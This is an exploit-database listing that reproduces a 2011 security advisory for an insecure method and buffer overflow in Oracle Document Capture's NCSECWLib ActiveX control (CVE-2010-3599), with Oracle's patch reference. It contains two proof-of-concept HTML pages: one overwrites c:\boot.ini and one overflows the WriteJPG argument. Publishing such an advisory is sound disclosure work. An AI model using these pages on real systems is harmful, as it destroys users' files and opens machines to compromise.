Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow

2011-01-26T00:00:00
ID 1337DAY-ID-15117
Type zdt
Reporter Alexandr Polyakov
Modified 2011-01-26T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            Application:                    Oracle Document Capture
Versions Affected:              Oracle Document Capture 10.1.3.5
Vendor URL:                     http://oracle.com
Bugs:                           Insecure method. Buffer overflow.
Exploits:                       YES
Reported:                       14.12.2009
Vendor response:                15.12.2009
Date of Public Advisory:        24.01.2011
CVE:                            CVE-2010-3599
Author:                         Alexandr Polyakov from DSecRG
 
Description
***********
 
Insecure method was founded in NCSECWLib ActiveX control component which is a part of  Oracle Document Capture .
One of the methods (WriteJPG) can be used to overwrite files on users system and also affected to buffer overflow.
 
 
 
 
Details
*******
 
Attacker can construct html page which call vulnerable function "WriteJPG" from ActiveX Object NCSECWLib.
 
Example 1 (file overwrite)
*******
 
 
<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype  = "Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As Long ,  ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid     = "NCSECWLib.NCSRenderer"
argCount   = 3
 
arg1="c:\boot.ini"
arg2=1
arg3=True
 
target.WriteJPG arg1 ,arg2 ,arg3
 
</script>
</html>
 
 
Example 2
*******
 
<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype  = "Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As Long ,  ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid     = "NCSECWLib.NCSRenderer"
argCount   = 3
 
arg1=String(13332, "A")
arg2=1
arg3=True
 
target.WriteJPG arg1 ,arg2 ,arg3
 
</script></job></package>
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
 
 
 
 
Fix Information
*************
 
Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from:
 
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html



#  0day.today [2018-01-01]  #